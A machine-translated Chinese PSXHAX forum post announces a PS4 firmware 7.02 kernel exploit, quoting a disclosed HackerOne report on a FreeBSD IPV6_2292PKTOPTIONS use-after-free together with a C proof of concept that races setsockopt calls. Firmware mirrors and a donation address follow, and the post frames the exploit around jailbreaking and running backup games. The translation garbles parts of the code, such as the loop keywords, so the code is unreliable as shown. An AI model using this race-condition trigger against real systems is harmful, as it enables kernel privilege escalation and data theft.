加入我们 并成为一个 会员 为一个 验证徽章不和谐 访问最新的私人区域 PS4 FPKG.
PS4越狱       线程启动器 PSXHAX       开始日期 2020年7月6日下午4:49       275,087       484      
状态
不接受进一步答复。
答应的 上个月,PlayStation 4场景开发人员 流量0 只是 掉落固件7.02的PS4内核利用(KEX) 而下面是 索尼修补7.50 PS4 OFW (当前的OFW为 7.51),并且可以与WebKit漏洞利用程序链接在一起,例如先前发布的userland PS4 6.XX WebKit漏洞利用 通过 火30_达到 6.72 PS4固件 根据 流量0米拉 支持 添加6.72 也一样! 😻
:警报: 这意味着,尽管今天的PS4内核漏洞可在固件7.02上运行。 目前只有一个PS4用户区漏洞利用高达6.72 公开可用!

场景开发 @Al Azif 建议 推特在完整的PS4越狱版本发布之前,没有人应该更新,但对于那些等不及的人 建议不要更新超过6.72@DEFAULTDNB推特 直到支持7.02表面的WebKit漏洞!
:警报:

他寄出 谢谢 出去 wi狗, flat_z, 幽灵发展 的PlayStation 进行合作,虽然并非所有PlayStation场景开发人员都可以 在同一页上 索尼的处理方式 的PlayStation Bug赏金计划对其他人来说是双赢 流量0 获得了的现金奖励 $10k 对于 他的报告 PS4的一面是今天将其公开披露给那些尚未更新的人。 全面越狱 到了! 💞

那些想表示感谢并捐赠给 流量0 可以通过以下方式做到:
  • 通过比特币361jRJtjppd2iyaAhBGjf9GUCWnunxtZ49
  • 通过 贝宝
  • 通过 Patreon
通过以下方式引用报告 HackerOne.com: IPV6_2292PKTOPTIONS中的释放后使用导致任意内核R / W基元

概要


由于setsockopt的选项IPV6_2292PKTOPTIONS中缺少锁,可以在ip6_setpktopt处理该结构时,争用并释放ip6_pktopts结构缓冲区。该结构包含可以被劫持以获得任意内核R / W原语的指针(ip6po_pktinfo)。

结果,很容易执行内核代码。此漏洞可从WebKit沙箱中获得,并且在最新的固件版本7.02中可用。

附件

附带的概念证明可在FreeBSD 9和FreeBSD 12上实现本地特权升级。
影响力
  • 结合WebKit利用,可以实现完全连锁的远程攻击。
  • 可以窃取/操纵用户数据。
  • 转储并运行备份游戏。
Code:
/*
* Race condition 在 ip6_ctloutput where 在6p is not locked when calling
* ip6_pcbopts, which allows 为一个 use after free 上  在6p->in6p_outputopts
*
* Build: gcc -std=c99 -o poc poc.c -lpthread
* Run: ./poc
*
* Discovered 通过 TJ Corley 8/15/2018
*/

#include <netinet/in.h>
#include <pthread.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>

#define IPV6_2292PKTOPTIONS 25

int s;

static void spam_valid() {
    char ctrl[CMSG_SPACE(sizeof(int))];

    struct cmsghdr *cmsg = (struct cmsghdr *)&ctrl;
    cmsg->cmsg_len = CMSG_LEN(4);
    cmsg->cmsg_level = IPPROTO_IPV6;
    cmsg->cmsg_type = IPV6_TCLASS;

    char *data = (char *)CMSG_DATA(cmsg);
    *(int *)data = 0x4;

    printf("spamming valid IPV6_2292PKTOPTIONS\n");
    对于 (;;) {
        setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, cmsg, CMSG_LEN(4));
    }
}

static void spam_zero_size_mbuf() {
    char *buf[0x4] = {};
    printf("spamming zero size mbuf\n");
    对于 (;;) {
        setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, buf, 0);
    }
}

int main() {
    pthread_t t;
    s = socket(AF_INET6, SOCK_DGRAM, 0);
    pthread_create(&t, NULL, (void *)spam_valid, NULL);
    spam_zero_size_mbuf();
}
下载: PS4UPDATE.pup (995.5 MB-PS4 6.72恢复PUP-MD5: 8140fdd70c1061c379f08566be022ecb)/ 镜子 / 镜子#2 / 镜子#3 / 镜子#4 通过 欧罗巴
下载: PS4UPDATE.pup (442.4 MB-PS4 6.72更新PUP-MD5: f3a31f64d894dc06040498cd7383bec2)/ 镜子 / 镜子#2 / 镜子#3 / 镜子#4 通过 欧罗巴
欢呼 @jwooh 对于单挑 利用 新闻,并在Discord的帮助下 PSXHAX会员验证 进入私人区域以获取最新的PS4 PKG游戏! 🍻
适用于7.02固件的PS4内核利用(KEX),请等待越狱,然后更新!.png
 

评论

状态
不接受进一步答复。
最佳